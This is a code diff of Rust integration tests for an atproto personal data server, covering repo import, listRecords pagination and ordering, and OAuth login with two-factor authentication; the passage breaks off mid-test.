··· 217 } 218 219 #[tokio::test] 220 async fn test_import_with_valid_signature_and_mock_plc() { 221 let client = client(); 222 let (token, did) = create_account_and_login(&client).await; ··· 266 } 267 268 #[tokio::test] 269 async fn test_import_with_wrong_signing_key_fails() { 270 let client = client(); 271 let (token, did) = create_account_and_login(&client).await; ··· 322 } 323 324 #[tokio::test] 325 async fn test_import_with_did_mismatch_fails() { 326 let client = client(); 327 let (token, did) = create_account_and_login(&client).await; ··· 373 } 374 375 #[tokio::test] 376 async fn test_import_with_plc_resolution_failure() { 377 let client = client(); 378 let (token, did) = create_account_and_login(&client).await; ··· 424 } 425 426 #[tokio::test] 427 async fn test_import_with_no_signing_key_in_did_doc() { 428 let client = client(); 429 let (token, did) = create_account_and_login(&client).await;
··· 217 } 218 219 #[tokio::test] 220 + #[ignore = "requires exclusive env var access; run with: cargo test test_import_with_valid_signature_and_mock_plc -- --ignored --test-threads=1"] 221 async fn test_import_with_valid_signature_and_mock_plc() { 222 let client = client(); 223 let (token, did) = create_account_and_login(&client).await; ··· 267 } 268 269 #[tokio::test] 270 + #[ignore = "requires exclusive env var access; run with: cargo test test_import_with_wrong_signing_key_fails -- --ignored --test-threads=1"] 271 async fn test_import_with_wrong_signing_key_fails() { 272 let client = client(); 273 let (token, did) = create_account_and_login(&client).await; ··· 324 } 325 326 #[tokio::test] 327 + #[ignore = "requires exclusive env var access; run with: cargo test test_import_with_did_mismatch_fails -- --ignored --test-threads=1"] 328 async fn test_import_with_did_mismatch_fails() { 329 let client = client(); 330 let (token, did) = create_account_and_login(&client).await; ··· 376 } 377 378 #[tokio::test] 379 + #[ignore = "requires exclusive env var access; run with: cargo test test_import_with_plc_resolution_failure -- --ignored --test-threads=1"] 380 async fn test_import_with_plc_resolution_failure() { 381 let client = client(); 382 let (token, did) = create_account_and_login(&client).await; ··· 428 } 429 430 #[tokio::test] 431 + #[ignore = "requires exclusive env var access; run with: cargo test test_import_with_no_signing_key_in_did_doc -- --ignored --test-threads=1"] 432 async fn test_import_with_no_signing_key_in_did_doc() { 433 let client = client(); 434 let (token, did) = create_account_and_login(&client).await;
+554
tests/list_records_pagination.rs
···
··· 1 + mod common; 2 + mod helpers; 3 + use common::*; 4 + use helpers::*; 5 + 6 + use chrono::Utc; 7 + use reqwest::StatusCode; 8 + use serde_json::{Value, json}; 9 + use std::time::Duration; 10 + 11 + async fn create_post_with_rkey( 12 + client: &reqwest::Client, 13 + did: &str, 14 + jwt: &str, 15 + rkey: &str, 16 + text: &str, 17 + ) -> (String, String) { 18 + let payload = json!({ 19 + "repo": did, 20 + "collection": "app.bsky.feed.post", 21 + "rkey": rkey, 22 + "record": { 23 + "$type": "app.bsky.feed.post", 24 + "text": text, 25 + "createdAt": Utc::now().to_rfc3339() 26 + } 27 + }); 28 + 29 + let res = client 30 + .post(format!( 31 + "{}/xrpc/com.atproto.repo.putRecord", 32 + base_url().await 33 + )) 34 + .bearer_auth(jwt) 35 + .json(&payload) 36 + .send() 37 + .await 38 + .expect("Failed to create record"); 39 + 40 + assert_eq!(res.status(), StatusCode::OK); 41 + let body: Value = res.json().await.unwrap(); 42 + ( 43 + body["uri"].as_str().unwrap().to_string(), 44 + body["cid"].as_str().unwrap().to_string(), 45 + ) 46 + } 47 + 48 + #[tokio::test] 49 + async fn test_list_records_default_order() { 50 + let client = client(); 51 + let (did, jwt) = setup_new_user("list-default-order").await; 52 + 53 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await; 54 + tokio::time::sleep(Duration::from_millis(50)).await; 55 + create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await; 56 + tokio::time::sleep(Duration::from_millis(50)).await; 57 + create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await; 58 + 59 + let res = client 60 + .get(format!( 61 + "{}/xrpc/com.atproto.repo.listRecords", 62 + base_url().await 63 + )) 64 + .query(&[ 65 + ("repo", did.as_str()), 66 + ("collection", "app.bsky.feed.post"), 67 + ]) 68 + .send() 69 + .await 70 + .expect("Failed to list records"); 71 + 72 + assert_eq!(res.status(), StatusCode::OK); 73 + let body: Value = res.json().await.unwrap(); 74 + let records = body["records"].as_array().unwrap(); 75 + 76 + assert_eq!(records.len(), 3); 77 + let rkeys: Vec<&str> = records 78 + .iter() 79 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 80 + .collect(); 81 + 82 + assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)"); 83 + } 84 + 85 + #[tokio::test] 86 + async fn test_list_records_reverse_true() { 87 + let client = client(); 88 + let (did, jwt) = setup_new_user("list-reverse").await; 89 + 90 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "First post").await; 91 + tokio::time::sleep(Duration::from_millis(50)).await; 92 + create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second post").await; 93 + tokio::time::sleep(Duration::from_millis(50)).await; 94 + create_post_with_rkey(&client, &did, &jwt, "cccc", "Third post").await; 95 + 96 + let res = client 97 + .get(format!( 98 + "{}/xrpc/com.atproto.repo.listRecords", 99 + base_url().await 100 + )) 101 + .query(&[ 102 + ("repo", did.as_str()), 103 + ("collection", "app.bsky.feed.post"), 104 + ("reverse", "true"), 105 + ]) 106 + .send() 107 + .await 108 + .expect("Failed to list records"); 109 + 110 + assert_eq!(res.status(), StatusCode::OK); 111 + let body: Value = res.json().await.unwrap(); 112 + let records = body["records"].as_array().unwrap(); 113 + 114 + let rkeys: Vec<&str> = records 115 + .iter() 116 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 117 + .collect(); 118 + 119 + assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)"); 120 + } 121 + 122 + #[tokio::test] 123 + async fn test_list_records_cursor_pagination() { 124 + let client = client(); 125 + let (did, jwt) = setup_new_user("list-cursor").await; 126 + 127 + for i in 0..5 { 128 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 129 + tokio::time::sleep(Duration::from_millis(50)).await; 130 + } 131 + 132 + let res = client 133 + .get(format!( 134 + "{}/xrpc/com.atproto.repo.listRecords", 135 + base_url().await 136 + )) 137 + .query(&[ 138 + ("repo", did.as_str()), 139 + ("collection", "app.bsky.feed.post"), 140 + ("limit", "2"), 141 + ]) 142 + .send() 143 + .await 144 + .expect("Failed to list records"); 145 + 146 + assert_eq!(res.status(), StatusCode::OK); 147 + let body: Value = res.json().await.unwrap(); 148 + let records = body["records"].as_array().unwrap(); 149 + assert_eq!(records.len(), 2); 150 + 151 + let cursor = body["cursor"].as_str().expect("Should have cursor with more records"); 152 + 153 + let res2 = client 154 + .get(format!( 155 + "{}/xrpc/com.atproto.repo.listRecords", 156 + base_url().await 157 + )) 158 + .query(&[ 159 + ("repo", did.as_str()), 160 + ("collection", "app.bsky.feed.post"), 161 + ("limit", "2"), 162 + ("cursor", cursor), 163 + ]) 164 + .send() 165 + .await 166 + .expect("Failed to list records with cursor"); 167 + 168 + assert_eq!(res2.status(), StatusCode::OK); 169 + let body2: Value = res2.json().await.unwrap(); 170 + let records2 = body2["records"].as_array().unwrap(); 171 + assert_eq!(records2.len(), 2); 172 + 173 + let all_uris: Vec<&str> = records 174 + .iter() 175 + .chain(records2.iter()) 176 + .map(|r| r["uri"].as_str().unwrap()) 177 + .collect(); 178 + let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 179 + assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 180 + } 181 + 182 + #[tokio::test] 183 + async fn test_list_records_rkey_start() { 184 + let client = client(); 185 + let (did, jwt) = setup_new_user("list-rkey-start").await; 186 + 187 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 188 + create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 189 + create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 190 + create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 191 + 192 + let res = client 193 + .get(format!( 194 + "{}/xrpc/com.atproto.repo.listRecords", 195 + base_url().await 196 + )) 197 + .query(&[ 198 + ("repo", did.as_str()), 199 + ("collection", "app.bsky.feed.post"), 200 + ("rkeyStart", "bbbb"), 201 + ("reverse", "true"), 202 + ]) 203 + .send() 204 + .await 205 + .expect("Failed to list records"); 206 + 207 + assert_eq!(res.status(), StatusCode::OK); 208 + let body: Value = res.json().await.unwrap(); 209 + let records = body["records"].as_array().unwrap(); 210 + 211 + let rkeys: Vec<&str> = records 212 + .iter() 213 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 214 + .collect(); 215 + 216 + for rkey in &rkeys { 217 + assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start"); 218 + } 219 + } 220 + 221 + #[tokio::test] 222 + async fn test_list_records_rkey_end() { 223 + let client = client(); 224 + let (did, jwt) = setup_new_user("list-rkey-end").await; 225 + 226 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 227 + create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 228 + create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 229 + create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 230 + 231 + let res = client 232 + .get(format!( 233 + "{}/xrpc/com.atproto.repo.listRecords", 234 + base_url().await 235 + )) 236 + .query(&[ 237 + ("repo", did.as_str()), 238 + ("collection", "app.bsky.feed.post"), 239 + ("rkeyEnd", "cccc"), 240 + ("reverse", "true"), 241 + ]) 242 + .send() 243 + .await 244 + .expect("Failed to list records"); 245 + 246 + assert_eq!(res.status(), StatusCode::OK); 247 + let body: Value = res.json().await.unwrap(); 248 + let records = body["records"].as_array().unwrap(); 249 + 250 + let rkeys: Vec<&str> = records 251 + .iter() 252 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 253 + .collect(); 254 + 255 + for rkey in &rkeys { 256 + assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end"); 257 + } 258 + } 259 + 260 + #[tokio::test] 261 + async fn test_list_records_rkey_range() { 262 + let client = client(); 263 + let (did, jwt) = setup_new_user("list-rkey-range").await; 264 + 265 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "First").await; 266 + create_post_with_rkey(&client, &did, &jwt, "bbbb", "Second").await; 267 + create_post_with_rkey(&client, &did, &jwt, "cccc", "Third").await; 268 + create_post_with_rkey(&client, &did, &jwt, "dddd", "Fourth").await; 269 + create_post_with_rkey(&client, &did, &jwt, "eeee", "Fifth").await; 270 + 271 + let res = client 272 + .get(format!( 273 + "{}/xrpc/com.atproto.repo.listRecords", 274 + base_url().await 275 + )) 276 + .query(&[ 277 + ("repo", did.as_str()), 278 + ("collection", "app.bsky.feed.post"), 279 + ("rkeyStart", "bbbb"), 280 + ("rkeyEnd", "dddd"), 281 + ("reverse", "true"), 282 + ]) 283 + .send() 284 + .await 285 + .expect("Failed to list records"); 286 + 287 + assert_eq!(res.status(), StatusCode::OK); 288 + let body: Value = res.json().await.unwrap(); 289 + let records = body["records"].as_array().unwrap(); 290 + 291 + let rkeys: Vec<&str> = records 292 + .iter() 293 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 294 + .collect(); 295 + 296 + for rkey in &rkeys { 297 + assert!(*rkey >= "bbbb" && *rkey <= "dddd", "Range should be inclusive, got {}", rkey); 298 + } 299 + assert!(!rkeys.is_empty(), "Should have at least some records in range"); 300 + } 301 + 302 + #[tokio::test] 303 + async fn test_list_records_limit_clamping_max() { 304 + let client = client(); 305 + let (did, jwt) = setup_new_user("list-limit-max").await; 306 + 307 + for i in 0..5 { 308 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 309 + } 310 + 311 + let res = client 312 + .get(format!( 313 + "{}/xrpc/com.atproto.repo.listRecords", 314 + base_url().await 315 + )) 316 + .query(&[ 317 + ("repo", did.as_str()), 318 + ("collection", "app.bsky.feed.post"), 319 + ("limit", "1000"), 320 + ]) 321 + .send() 322 + .await 323 + .expect("Failed to list records"); 324 + 325 + assert_eq!(res.status(), StatusCode::OK); 326 + let body: Value = res.json().await.unwrap(); 327 + let records = body["records"].as_array().unwrap(); 328 + assert!(records.len() <= 100, "Limit should be clamped to max 100"); 329 + } 330 + 331 + #[tokio::test] 332 + async fn test_list_records_limit_clamping_min() { 333 + let client = client(); 334 + let (did, jwt) = setup_new_user("list-limit-min").await; 335 + 336 + create_post_with_rkey(&client, &did, &jwt, "aaaa", "Post").await; 337 + 338 + let res = client 339 + .get(format!( 340 + "{}/xrpc/com.atproto.repo.listRecords", 341 + base_url().await 342 + )) 343 + .query(&[ 344 + ("repo", did.as_str()), 345 + ("collection", "app.bsky.feed.post"), 346 + ("limit", "0"), 347 + ]) 348 + .send() 349 + .await 350 + .expect("Failed to list records"); 351 + 352 + assert_eq!(res.status(), StatusCode::OK); 353 + let body: Value = res.json().await.unwrap(); 354 + let records = body["records"].as_array().unwrap(); 355 + assert!(records.len() >= 1, "Limit should be clamped to min 1"); 356 + } 357 + 358 + #[tokio::test] 359 + async fn test_list_records_empty_collection() { 360 + let client = client(); 361 + let (did, _jwt) = setup_new_user("list-empty").await; 362 + 363 + let res = client 364 + .get(format!( 365 + "{}/xrpc/com.atproto.repo.listRecords", 366 + base_url().await 367 + )) 368 + .query(&[ 369 + ("repo", did.as_str()), 370 + ("collection", "app.bsky.feed.post"), 371 + ]) 372 + .send() 373 + .await 374 + .expect("Failed to list records"); 375 + 376 + assert_eq!(res.status(), StatusCode::OK); 377 + let body: Value = res.json().await.unwrap(); 378 + let records = body["records"].as_array().unwrap(); 379 + assert!(records.is_empty(), "Empty collection should return empty array"); 380 + assert!(body["cursor"].is_null(), "Empty collection should have no cursor"); 381 + } 382 + 383 + #[tokio::test] 384 + async fn test_list_records_exact_limit() { 385 + let client = client(); 386 + let (did, jwt) = setup_new_user("list-exact-limit").await; 387 + 388 + for i in 0..10 { 389 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 390 + } 391 + 392 + let res = client 393 + .get(format!( 394 + "{}/xrpc/com.atproto.repo.listRecords", 395 + base_url().await 396 + )) 397 + .query(&[ 398 + ("repo", did.as_str()), 399 + ("collection", "app.bsky.feed.post"), 400 + ("limit", "5"), 401 + ]) 402 + .send() 403 + .await 404 + .expect("Failed to list records"); 405 + 406 + assert_eq!(res.status(), StatusCode::OK); 407 + let body: Value = res.json().await.unwrap(); 408 + let records = body["records"].as_array().unwrap(); 409 + assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5"); 410 + } 411 + 412 + #[tokio::test] 413 + async fn test_list_records_cursor_exhaustion() { 414 + let client = client(); 415 + let (did, jwt) = setup_new_user("list-cursor-exhaust").await; 416 + 417 + for i in 0..3 { 418 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 419 + } 420 + 421 + let res = client 422 + .get(format!( 423 + "{}/xrpc/com.atproto.repo.listRecords", 424 + base_url().await 425 + )) 426 + .query(&[ 427 + ("repo", did.as_str()), 428 + ("collection", "app.bsky.feed.post"), 429 + ("limit", "10"), 430 + ]) 431 + .send() 432 + .await 433 + .expect("Failed to list records"); 434 + 435 + assert_eq!(res.status(), StatusCode::OK); 436 + let body: Value = res.json().await.unwrap(); 437 + let records = body["records"].as_array().unwrap(); 438 + assert_eq!(records.len(), 3); 439 + } 440 + 441 + #[tokio::test] 442 + async fn test_list_records_repo_not_found() { 443 + let client = client(); 444 + 445 + let res = client 446 + .get(format!( 447 + "{}/xrpc/com.atproto.repo.listRecords", 448 + base_url().await 449 + )) 450 + .query(&[ 451 + ("repo", "did:plc:nonexistent12345"), 452 + ("collection", "app.bsky.feed.post"), 453 + ]) 454 + .send() 455 + .await 456 + .expect("Failed to list records"); 457 + 458 + assert_eq!(res.status(), StatusCode::NOT_FOUND); 459 + } 460 + 461 + #[tokio::test] 462 + async fn test_list_records_includes_cid() { 463 + let client = client(); 464 + let (did, jwt) = setup_new_user("list-includes-cid").await; 465 + 466 + create_post_with_rkey(&client, &did, &jwt, "test", "Test post").await; 467 + 468 + let res = client 469 + .get(format!( 470 + "{}/xrpc/com.atproto.repo.listRecords", 471 + base_url().await 472 + )) 473 + .query(&[ 474 + ("repo", did.as_str()), 475 + ("collection", "app.bsky.feed.post"), 476 + ]) 477 + .send() 478 + .await 479 + .expect("Failed to list records"); 480 + 481 + assert_eq!(res.status(), StatusCode::OK); 482 + let body: Value = res.json().await.unwrap(); 483 + let records = body["records"].as_array().unwrap(); 484 + 485 + for record in records { 486 + assert!(record["uri"].is_string(), "Record should have uri"); 487 + assert!(record["cid"].is_string(), "Record should have cid"); 488 + assert!(record["value"].is_object(), "Record should have value"); 489 + let cid = record["cid"].as_str().unwrap(); 490 + assert!(cid.starts_with("bafy"), "CID should be valid"); 491 + } 492 + } 493 + 494 + #[tokio::test] 495 + async fn test_list_records_cursor_with_reverse() { 496 + let client = client(); 497 + let (did, jwt) = setup_new_user("list-cursor-reverse").await; 498 + 499 + for i in 0..5 { 500 + create_post_with_rkey(&client, &did, &jwt, &format!("post{:02}", i), &format!("Post {}", i)).await; 501 + } 502 + 503 + let res = client 504 + .get(format!( 505 + "{}/xrpc/com.atproto.repo.listRecords", 506 + base_url().await 507 + )) 508 + .query(&[ 509 + ("repo", did.as_str()), 510 + ("collection", "app.bsky.feed.post"), 511 + ("limit", "2"), 512 + ("reverse", "true"), 513 + ]) 514 + .send() 515 + .await 516 + .expect("Failed to list records"); 517 + 518 + assert_eq!(res.status(), StatusCode::OK); 519 + let body: Value = res.json().await.unwrap(); 520 + let records = body["records"].as_array().unwrap(); 521 + let first_rkeys: Vec<&str> = records 522 + .iter() 523 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 524 + .collect(); 525 + 526 + assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest"); 527 + 528 + if let Some(cursor) = body["cursor"].as_str() { 529 + let res2 = client 530 + .get(format!( 531 + "{}/xrpc/com.atproto.repo.listRecords", 532 + base_url().await 533 + )) 534 + .query(&[ 535 + ("repo", did.as_str()), 536 + ("collection", "app.bsky.feed.post"), 537 + ("limit", "2"), 538 + ("reverse", "true"), 539 + ("cursor", cursor), 540 + ]) 541 + .send() 542 + .await 543 + .expect("Failed to list records with cursor"); 544 + 545 + let body2: Value = res2.json().await.unwrap(); 546 + let records2 = body2["records"].as_array().unwrap(); 547 + let second_rkeys: Vec<&str> = records2 548 + .iter() 549 + .map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap()) 550 + .collect(); 551 + 552 + assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order"); 553 + } 554 + }
+633
tests/oauth.rs
··· 323 324 let auth_res = client 325 .get(format!("{}/oauth/authorize", url)) 326 .query(&[("request_uri", request_uri)]) 327 .send() 328 .await ··· 344 345 let res = client 346 .get(format!("{}/oauth/authorize", url)) 347 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 348 .send() 349 .await ··· 941 942 let auth_res = http_client 943 .post(format!("{}/oauth/authorize", url)) 944 .form(&[ 945 ("request_uri", request_uri), 946 ("username", &handle), ··· 1162 1163 let auth_res = http_client 1164 .post(format!("{}/oauth/authorize", url)) 1165 .form(&[ 1166 ("request_uri", request_uri), 1167 ("username", &handle), ··· 1184 1185 let res = http_client 1186 .get(format!("{}/oauth/authorize", url)) 1187 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")]) 1188 .send() 1189 .await ··· 1477 location 1478 ); 1479 }
··· 323 324 let auth_res = client 325 .get(format!("{}/oauth/authorize", url)) 326 + .header("Accept", "application/json") 327 .query(&[("request_uri", request_uri)]) 328 .send() 329 .await ··· 345 346 let res = client 347 .get(format!("{}/oauth/authorize", url)) 348 + .header("Accept", "application/json") 349 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")]) 350 .send() 351 .await ··· 943 944 let auth_res = http_client 945 .post(format!("{}/oauth/authorize", url)) 946 + .header("Accept", "application/json") 947 .form(&[ 948 ("request_uri", request_uri), 949 ("username", &handle), ··· 1165 1166 let auth_res = http_client 1167 .post(format!("{}/oauth/authorize", url)) 1168 + .header("Accept", "application/json") 1169 .form(&[ 1170 ("request_uri", request_uri), 1171 ("username", &handle), ··· 1188 1189 let res = http_client 1190 .get(format!("{}/oauth/authorize", url)) 1191 + .header("Accept", "application/json") 1192 .query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")]) 1193 .send() 1194 .await ··· 1482 location 1483 ); 1484 } 1485 + 1486 + #[tokio::test] 1487 + async fn test_2fa_required_when_enabled() { 1488 + let url = base_url().await; 1489 + let http_client = client(); 1490 + 1491 + let ts = Utc::now().timestamp_millis(); 1492 + let handle = format!("2fa-required-{}", ts); 1493 + let email = format!("2fa-required-{}@example.com", ts); 1494 + let password = "2fa-test-password"; 1495 + 1496 + let create_res = http_client 1497 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1498 + .json(&json!({ 1499 + "handle": handle, 1500 + "email": email, 1501 + "password": password 1502 + })) 1503 + .send() 1504 + .await 1505 + .unwrap(); 1506 + assert_eq!(create_res.status(), StatusCode::OK); 1507 + let account: Value = create_res.json().await.unwrap(); 1508 + let user_did = account["did"].as_str().unwrap(); 1509 + 1510 + let db_url = common::get_db_connection_string().await; 1511 + let pool = sqlx::postgres::PgPoolOptions::new() 1512 + .max_connections(1) 1513 + .connect(&db_url) 1514 + .await 1515 + .expect("Failed to connect to database"); 1516 + 1517 + sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1518 + .bind(user_did) 1519 + .execute(&pool) 1520 + .await 1521 + .expect("Failed to enable 2FA"); 1522 + 1523 + let redirect_uri = "https://example.com/2fa-callback"; 1524 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 1525 + let client_id = mock_client.uri(); 1526 + 1527 + let (_, code_challenge) = generate_pkce(); 1528 + 1529 + let par_body: Value = http_client 1530 + .post(format!("{}/oauth/par", url)) 1531 + .form(&[ 1532 + ("response_type", "code"), 1533 + ("client_id", &client_id), 1534 + ("redirect_uri", redirect_uri), 1535 + ("code_challenge", &code_challenge), 1536 + ("code_challenge_method", "S256"), 1537 + ]) 1538 + .send() 1539 + .await 1540 + .unwrap() 1541 + .json() 1542 + .await 1543 + .unwrap(); 1544 + 1545 + let request_uri = par_body["request_uri"].as_str().unwrap(); 1546 + 1547 + let auth_client = no_redirect_client(); 1548 + let auth_res = auth_client 1549 + .post(format!("{}/oauth/authorize", url)) 1550 + .form(&[ 1551 + ("request_uri", request_uri), 1552 + ("username", &handle), 1553 + ("password", password), 1554 + ("remember_device", "false"), 1555 + ]) 1556 + .send() 1557 + .await 1558 + .unwrap(); 1559 + 1560 + assert!( 1561 + auth_res.status().is_redirection(), 1562 + "Should redirect to 2FA page, got status: {}", 1563 + auth_res.status() 1564 + ); 1565 + 1566 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1567 + assert!( 1568 + location.contains("/oauth/authorize/2fa"), 1569 + "Should redirect to 2FA page, got: {}", 1570 + location 1571 + ); 1572 + assert!( 1573 + location.contains("request_uri="), 1574 + "2FA redirect should include request_uri" 1575 + ); 1576 + } 1577 + 1578 + #[tokio::test] 1579 + async fn test_2fa_invalid_code_rejected() { 1580 + let url = base_url().await; 1581 + let http_client = client(); 1582 + 1583 + let ts = Utc::now().timestamp_millis(); 1584 + let handle = format!("2fa-invalid-{}", ts); 1585 + let email = format!("2fa-invalid-{}@example.com", ts); 1586 + let password = "2fa-test-password"; 1587 + 1588 + let create_res = http_client 1589 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1590 + .json(&json!({ 1591 + "handle": handle, 1592 + "email": email, 1593 + "password": password 1594 + })) 1595 + .send() 1596 + .await 1597 + .unwrap(); 1598 + assert_eq!(create_res.status(), StatusCode::OK); 1599 + let account: Value = create_res.json().await.unwrap(); 1600 + let user_did = account["did"].as_str().unwrap(); 1601 + 1602 + let db_url = common::get_db_connection_string().await; 1603 + let pool = sqlx::postgres::PgPoolOptions::new() 1604 + .max_connections(1) 1605 + .connect(&db_url) 1606 + .await 1607 + .expect("Failed to connect to database"); 1608 + 1609 + sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1610 + .bind(user_did) 1611 + .execute(&pool) 1612 + .await 1613 + .expect("Failed to enable 2FA"); 1614 + 1615 + let redirect_uri = "https://example.com/2fa-invalid-callback"; 1616 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 1617 + let client_id = mock_client.uri(); 1618 + 1619 + let (_, code_challenge) = generate_pkce(); 1620 + 1621 + let par_body: Value = http_client 1622 + .post(format!("{}/oauth/par", url)) 1623 + .form(&[ 1624 + ("response_type", "code"), 1625 + ("client_id", &client_id), 1626 + ("redirect_uri", redirect_uri), 1627 + ("code_challenge", &code_challenge), 1628 + ("code_challenge_method", "S256"), 1629 + ]) 1630 + .send() 1631 + .await 1632 + .unwrap() 1633 + .json() 1634 + .await 1635 + .unwrap(); 1636 + 1637 + let request_uri = par_body["request_uri"].as_str().unwrap(); 1638 + 1639 + let auth_client = no_redirect_client(); 1640 + let auth_res = auth_client 1641 + .post(format!("{}/oauth/authorize", url)) 1642 + .form(&[ 1643 + ("request_uri", request_uri), 1644 + ("username", &handle), 1645 + ("password", password), 1646 + ("remember_device", "false"), 1647 + ]) 1648 + .send() 1649 + .await 1650 + .unwrap(); 1651 + 1652 + assert!(auth_res.status().is_redirection()); 1653 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1654 + assert!(location.contains("/oauth/authorize/2fa")); 1655 + 1656 + let twofa_res = http_client 1657 + .post(format!("{}/oauth/authorize/2fa", url)) 1658 + .form(&[ 1659 + ("request_uri", request_uri), 1660 + ("code", "000000"), 1661 + ]) 1662 + .send() 1663 + .await 1664 + .unwrap(); 1665 + 1666 + assert_eq!(twofa_res.status(), StatusCode::OK); 1667 + let body = twofa_res.text().await.unwrap(); 1668 + assert!( 1669 + body.contains("Invalid verification code") || body.contains("invalid"), 1670 + "Should show error for invalid code" 1671 + ); 1672 + } 1673 + 1674 + #[tokio::test] 1675 + async fn test_2fa_valid_code_completes_auth() { 1676 + let url = base_url().await; 1677 + let http_client = client(); 1678 + 1679 + let ts = Utc::now().timestamp_millis(); 1680 + let handle = format!("2fa-valid-{}", ts); 1681 + let email = format!("2fa-valid-{}@example.com", ts); 1682 + let password = "2fa-test-password"; 1683 + 1684 + let create_res = http_client 1685 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1686 + .json(&json!({ 1687 + "handle": handle, 1688 + "email": email, 1689 + "password": password 1690 + })) 1691 + .send() 1692 + .await 1693 + .unwrap(); 1694 + assert_eq!(create_res.status(), StatusCode::OK); 1695 + let account: Value = create_res.json().await.unwrap(); 1696 + let user_did = account["did"].as_str().unwrap(); 1697 + 1698 + let db_url = common::get_db_connection_string().await; 1699 + let pool = sqlx::postgres::PgPoolOptions::new() 1700 + .max_connections(1) 1701 + .connect(&db_url) 1702 + .await 1703 + .expect("Failed to connect to database"); 1704 + 1705 + sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1706 + .bind(user_did) 1707 + .execute(&pool) 1708 + .await 1709 + .expect("Failed to enable 2FA"); 1710 + 1711 + let redirect_uri = "https://example.com/2fa-valid-callback"; 1712 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 1713 + let client_id = mock_client.uri(); 1714 + 1715 + let (code_verifier, code_challenge) = generate_pkce(); 1716 + 1717 + let par_body: Value = http_client 1718 + .post(format!("{}/oauth/par", url)) 1719 + .form(&[ 1720 + ("response_type", "code"), 1721 + ("client_id", &client_id), 1722 + ("redirect_uri", redirect_uri), 1723 + ("code_challenge", &code_challenge), 1724 + ("code_challenge_method", "S256"), 1725 + ]) 1726 + .send() 1727 + .await 1728 + .unwrap() 1729 + .json() 1730 + .await 1731 + .unwrap(); 1732 + 1733 + let request_uri = par_body["request_uri"].as_str().unwrap(); 1734 + 1735 + let auth_client = no_redirect_client(); 1736 + let auth_res = auth_client 1737 + .post(format!("{}/oauth/authorize", url)) 1738 + .form(&[ 1739 + ("request_uri", request_uri), 1740 + ("username", &handle), 1741 + ("password", password), 1742 + ("remember_device", "false"), 1743 + ]) 1744 + .send() 1745 + .await 1746 + .unwrap(); 1747 + 1748 + assert!(auth_res.status().is_redirection()); 1749 + 1750 + let twofa_code: String = sqlx::query_scalar( 1751 + "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1" 1752 + ) 1753 + .bind(request_uri) 1754 + .fetch_one(&pool) 1755 + .await 1756 + .expect("Failed to get 2FA code from database"); 1757 + 1758 + let twofa_res = auth_client 1759 + .post(format!("{}/oauth/authorize/2fa", url)) 1760 + .form(&[ 1761 + ("request_uri", request_uri), 1762 + ("code", &twofa_code), 1763 + ]) 1764 + .send() 1765 + .await 1766 + .unwrap(); 1767 + 1768 + assert!( 1769 + twofa_res.status().is_redirection(), 1770 + "Valid 2FA code should redirect to success, got status: {}", 1771 + twofa_res.status() 1772 + ); 1773 + 1774 + let location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 1775 + assert!( 1776 + location.starts_with(redirect_uri), 1777 + "Should redirect to client callback, got: {}", 1778 + location 1779 + ); 1780 + assert!( 1781 + location.contains("code="), 1782 + "Redirect should include authorization code" 1783 + ); 1784 + 1785 + let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 1786 + 1787 + let token_res = http_client 1788 + .post(format!("{}/oauth/token", url)) 1789 + .form(&[ 1790 + ("grant_type", 